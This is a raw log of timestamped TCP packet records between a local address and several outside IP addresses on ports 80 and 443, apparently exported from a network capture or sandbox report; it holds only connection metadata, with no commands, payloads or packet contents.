Dec 22, 2024 02:16:44.858688116 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.858726025 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.858766079 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.859852076 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.859958887 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.859972954 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.859999895 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.861095905 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.861167908 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.861176014 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.861221075 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.862340927 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.862407923 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.862463951 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.862536907 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.863548040 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.863595963 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.863750935 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.863863945 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.864779949 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.864898920 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.864968061 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.865020037 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.865992069 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.866056919 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.866128922 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.866183996 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.867214918 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.867290974 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.867372036 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.867417097 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.868448973 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.868486881 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.868568897 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.868617058 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.869652987 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.869699955 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.869745970 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.869836092 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.870910883 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.870965958 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.870974064 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.871014118 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.872112989 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.872194052 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.872231960 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.872279882 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.873323917 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.873393059 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.873435020 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.873503923 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.874550104 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.874584913 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.874669075 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.874710083 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:44.875757933 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:44.875899076 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.005320072 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.005409956 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.005616903 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.005673885 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.005733967 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.005738020 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.006725073 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.006799936 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.006814003 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.007708073 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.007766962 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.007774115 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.007821083 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.008620977 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.008694887 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.008779049 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.009612083 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.009725094 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.009767056 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.010657072 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.010757923 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.010761976 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.011657953 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.011779070 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.011814117 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.012144089 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.012671947 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.012780905 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.012856960 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.013689995 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.013799906 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.013870001 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.014718056 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.014767885 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.014834881 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.015737057 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.015805006 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.015845060 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.016124010 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.016747952 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.016885996 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.016940117 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.017853975 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.017952919 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.018023014 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.018795013 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.018920898 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.018927097 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.019809961 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.019926071 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.019999027 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.020226955 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.020853043 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.020982027 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.021058083 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.021924019 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.022057056 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.022150040 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.022906065 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.022947073 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.023091078 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.024015903 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.024055958 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.024197102 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.024971008 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.025017977 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.025043964 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.025058985 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.025939941 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.026051044 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.026119947 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.026961088 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.027056932 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.027112961 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.027983904 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.028032064 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.028059006 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.028381109 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.029093981 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.029206038 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.029211998 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.029347897 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.030045033 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.030148983 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.030168056 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.031043053 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.031114101 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.031167984 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.032073975 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.032131910 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.032131910 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.032196045 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.032248974 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.033085108 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.033138037 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.033217907 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.033291101 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.034111023 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.034229994 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.034240961 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.035140991 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.035212994 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.035262108 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.036120892 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.036154985 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.036333084 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.036412954 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.037173986 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.037297964 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.037595034 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.038192987 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.038281918 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.038314104 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.039201975 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.039297104 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.039344072 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.040122032 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.040235043 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.040364027 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.040421009 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.041254044 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.041372061 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.041426897 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.042269945 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.042351961 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.042412043 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.043343067 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.043405056 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.043435097 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.044344902 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.044405937 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.044472933 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.044527054 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.045366049 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.045470953 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.045562029 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.045648098 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.046360016 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.046443939 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.046483994 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.046540976 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.047393084 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.047482967 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.047535896 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.048082113 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.048409939 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.048537970 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.048543930 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.048607111 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.049438953 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.049523115 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.049634933 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.050463915 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.050532103 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.050554037 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.051508904 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.051580906 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.051620960 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.052229881 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.052462101 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.052611113 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.052707911 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.053508043 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.053631067 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.053710938 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.054552078 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.054663897 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.054671049 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.055600882 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.055691957 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.055723906 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.055808067 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.056566954 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.056714058 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.056866884 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.057605028 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.057682037 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.057790995 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.058552980 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.058636904 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.194026947 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.194133997 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.194200993 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.194247007 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.194247961 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.194323063 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.195260048 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.195328951 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.195394993 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.196253061 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.196302891 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.196398020 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.197277069 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.197351933 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.197382927 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.197405100 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.198286057 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.198399067 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.198458910 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.199341059 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.199398994 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.199444056 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.200351954 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.200481892 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.200522900 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.201334000 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.201404095 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.201471090 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.202310085 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:45.202375889 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:45.360780954 CET	443	49852	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:45.360975981 CET	49852	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:45.545074940 CET	49852	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:45.545103073 CET	443	49852	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:45.545387983 CET	443	49852	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:45.574263096 CET	49852	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:45.574378967 CET	49852	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:45.574403048 CET	443	49852	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:45.744546890 CET	443	49858	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:45.744611979 CET	49858	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:45.771382093 CET	49858	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:45.771403074 CET	443	49858	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:45.771646976 CET	443	49858	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:45.776191950 CET	49858	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:45.777098894 CET	49858	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:45.777129889 CET	443	49858	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:45.777343988 CET	49858	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:45.777373075 CET	443	49858	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:45.778124094 CET	49858	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:45.778160095 CET	443	49858	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:45.778314114 CET	49858	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:45.778347969 CET	443	49858	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:45.779359102 CET	49858	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:45.779382944 CET	443	49858	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:45.779535055 CET	49858	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:45.779562950 CET	443	49858	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:45.779575109 CET	49858	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:45.779578924 CET	443	49858	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:45.779690981 CET	49858	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:45.779716015 CET	443	49858	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:45.779736996 CET	49858	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:45.779864073 CET	49858	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:45.779894114 CET	49858	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:45.827343941 CET	443	49858	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:45.830184937 CET	49858	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:45.830226898 CET	443	49858	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:45.830251932 CET	49858	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:45.830265045 CET	443	49858	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:45.830288887 CET	49858	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:45.830296040 CET	443	49858	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:45.830307007 CET	49858	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:45.830311060 CET	443	49858	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:46.264226913 CET	49846	80	192.168.2.4	212.193.31.8
Dec 22, 2024 02:16:46.656909943 CET	443	49852	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:46.657016039 CET	443	49852	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:46.657062054 CET	49852	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:46.657156944 CET	49852	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:46.657172918 CET	443	49852	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:46.932461023 CET	49863	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:46.932512999 CET	443	49863	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:46.935022116 CET	49863	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:46.935570955 CET	49863	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:46.935591936 CET	443	49863	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:47.571203947 CET	49842	80	192.168.2.4	185.215.113.43
Dec 22, 2024 02:16:47.571331978 CET	49865	80	192.168.2.4	185.215.113.43
Dec 22, 2024 02:16:47.691447020 CET	80	49865	185.215.113.43	192.168.2.4
Dec 22, 2024 02:16:47.691468954 CET	80	49842	185.215.113.43	192.168.2.4
Dec 22, 2024 02:16:47.691706896 CET	49865	80	192.168.2.4	185.215.113.43
Dec 22, 2024 02:16:47.691709042 CET	49842	80	192.168.2.4	185.215.113.43
Dec 22, 2024 02:16:47.694097996 CET	49865	80	192.168.2.4	185.215.113.43
Dec 22, 2024 02:16:47.813863993 CET	80	49865	185.215.113.43	192.168.2.4
Dec 22, 2024 02:16:47.835288048 CET	49866	80	192.168.2.4	212.193.31.8
Dec 22, 2024 02:16:47.954864025 CET	80	49866	212.193.31.8	192.168.2.4
Dec 22, 2024 02:16:47.954976082 CET	49866	80	192.168.2.4	212.193.31.8
Dec 22, 2024 02:16:48.055377960 CET	49866	80	192.168.2.4	212.193.31.8
Dec 22, 2024 02:16:48.149245024 CET	443	49863	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:48.149319887 CET	49863	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:48.175076008 CET	80	49866	212.193.31.8	192.168.2.4
Dec 22, 2024 02:16:48.288618088 CET	49863	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:48.288639069 CET	443	49863	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:48.288959026 CET	443	49863	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:48.290496111 CET	49863	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:48.290656090 CET	49863	443	192.168.2.4	104.21.67.146
